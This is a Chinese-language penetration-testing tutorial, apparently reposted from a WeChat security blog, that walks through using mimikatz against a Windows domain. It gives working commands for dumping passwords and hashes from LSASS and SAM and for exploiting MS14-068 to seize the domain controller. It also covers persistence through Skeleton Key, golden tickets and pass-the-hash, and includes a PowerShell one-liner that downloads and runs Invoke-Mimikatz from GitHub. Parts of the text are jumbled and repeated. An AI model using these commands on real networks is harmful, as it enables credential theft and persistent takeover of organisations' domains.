内网渗透中mimikatz的使用

admin 2021年9月8日19:47:15评论166 views字数 1774阅读5分54秒阅读模式

0x01 简介

mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单

0x02 测试环境

网络资源管理模式:

 
已有资源:

域内一台主机权限 
操作系统:win7 x64 
域权限:普通用户

0x03 测试目标

1、获得域控权限 2、导出所有用户口令 3、维持域控权限

0x04 测试过程

1、获取本机信息

mimikatz privilege::debug sekurlsa::logonpasswords

获取本机用户名、口令、sid、LM hash、NTLM hash 如图

内网渗透中mimikatz的使用

2、攻击域控,获得权限

使用ms14-068漏洞

ms14-068.exe -u -p -s -d 
生成伪造缓存test.ccache:

内网渗透中mimikatz的使用
导入伪造缓存: mimikatz:

kerberos::ptc test.ccache 登陆: net use \A-635ECAEE64804.TEST.LOCAL dir \A-635ECAEE64804.TEST.LOCALc$

内网渗透中mimikatz的使用
3、导出域(1)直接获取内存口令 mimikatz:

privilege::debug sekurlsa::logonpasswords 2)通过内存文件获取口令 使用procdump导出lsass.dmp mimikatz sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full 3)通过powershell加载mimikatz获取口令 powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz 4)导出所有用户口令 使用Volue Shadow Copy获得SYSTEMSAM备份(之前文章有介绍) mimikatz lsadump::sam SYSTEM.hiv SAM.hiv持域控权限 1Skeleton Key mimikatz
privilege::debug misc::skeleton 万能钥匙,可使用任意用户登陆域控 net use \A-635ECAEE64804.TEST.LOCAL mimikatz /usertest

4、维持域控权限

(1)Skeleton Key mimikatz:

privilege::debug misc::skeleton 万能钥匙,可使用任意用户登陆域控 net use \A-635ECAEE64804.TEST.LOCAL mimikatz /usertest

内网渗透中mimikatz的使用
(2)golden ticket mimikatz: lsadump::lsa /patch 
获取krbtgt的ntlmhash,如图
内网渗透中mimikatz的使用

生成万能票据: mimikatz:

kerberos::golden /user:Administrator /domain:test.local /sid:S-1-5-21-2848411111-3820811111-1717111111 /krbtgt:d3b949b1f4ef94782

内网渗透中mimikatz的使用

Tips:

Golden Ticket不多说,自行理解 
By default, the Golden Ticket default lifetime is 10 years 
password changing/smartcard usage does not invalidate Golden Ticket; 
this ticket is not emitted by the real KDC, it’s not related to ciphering methods allowed; 
NTLM hash of krbtgt account is never changed automatically. 
(3)Pass-The-Hash mimikatz:

sekurlsa::pth /user:Administrator /domain:test.local /ntlm:cc36cf7a8514893efccd332446158b1a

内网渗透中mimikatz的使用

5、补充

登陆域控,刷新扫雷记录,留下名字;D mimikatz:

minesweeper::infos 
如图

内网渗透中mimikatz的使用

本文始发于微信公众号(飓风网络安全):内网渗透中mimikatz的使用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月8日19:47:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透中mimikatz的使用https://cn-sec.com/archives/359705.html

发表评论

匿名网友 填写信息